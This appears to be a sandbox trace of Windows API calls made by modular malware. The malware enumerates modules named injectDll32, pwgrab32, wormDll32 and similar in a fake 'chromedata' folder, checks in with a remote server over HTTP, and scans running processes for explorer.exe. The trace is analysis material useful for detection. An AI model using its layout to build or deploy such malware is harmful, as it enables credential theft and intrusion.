	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff900
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0246.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff900, Size=0x10) returned 0x22ffd80
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0246.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffd80, Size=0x10) returned 0x22ff900
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0246.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff900, Size=0x10) returned 0x22ffd80
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0246.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffd80, Size=0x20) returned 0x27bf680
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0246.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bf680, Size=0x20) returned 0x27c0850
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0246.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c0850, Size=0x20) returned 0x27bf680
	[0246.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.878] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0246.878] GetLastError () returned 0x12
	[0246.878] FindClose (in: hFindFile=0x22b6f40 | out: hFindFile=0x22b6f40) returned 1
	[0246.879] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0246.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26cdc48
	[0246.879] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26cdc48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0246.879] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.879] GetFileTime (in: hFile=0x600, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.879] CloseHandle (hObject=0x600) returned 1
	[0246.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.879] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0246.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0246.879] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x21d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0246.879] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.879] GetFileTime (in: hFile=0x600, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.880] CloseHandle (hObject=0x600) returned 1
	[0246.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.880] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0246.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0246.880] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x21d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0246.880] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.880] GetFileTime (in: hFile=0x600, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.880] CloseHandle (hObject=0x600) returned 1
	[0246.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.880] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0246.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0246.880] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x21d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0246.881] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.881] GetFileTime (in: hFile=0x600, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.881] CloseHandle (hObject=0x600) returned 1
	[0246.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.881] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0246.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0246.881] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x21d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0246.881] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.881] GetFileTime (in: hFile=0x600, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.881] CloseHandle (hObject=0x600) returned 1
	[0246.881] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.882] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0246.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0246.882] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x21d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0246.882] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.882] GetFileTime (in: hFile=0x600, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.882] CloseHandle (hObject=0x600) returned 1
	[0246.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.882] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0246.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0246.882] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x21d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0246.882] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.882] GetFileTime (in: hFile=0x600, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.883] CloseHandle (hObject=0x600) returned 1
	[0246.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.883] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0246.883] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0246.883] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/pCVsEUl6NgxKh2Lf2Ok2Ok5Qn4/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0246.884] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0246.884] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0247.157] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0247.157] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0247.157] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0247.157] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14e0
	[0247.157] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x27e14e0, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x27e14e0*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0247.158] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0247.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e14e0, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0247.158] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14f8
	[0247.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e14e0, cbMultiByte=3, lpWideCharStr=0x27e14f8, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0247.159] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0247.159] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0247.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e17b0
	[0247.159] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14b0
	[0247.159] lstrcpynW (in: lpString1=0x27e14b0, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0247.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1618) returned 1
	[0247.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14f8) returned 1
	[0247.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e17b0) returned 1
	[0247.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14e0) returned 1
	[0247.159] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x678
	[0247.163] Process32FirstW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0247.165] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0247.165] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0247.166] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0247.166] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0247.181] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0247.182] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.183] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0247.183] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0247.184] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0247.184] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.186] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0247.186] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0247.187] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0247.187] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0247.188] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0247.188] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0247.190] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0247.190] Process32NextW (in: hSnapshot=0x678, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
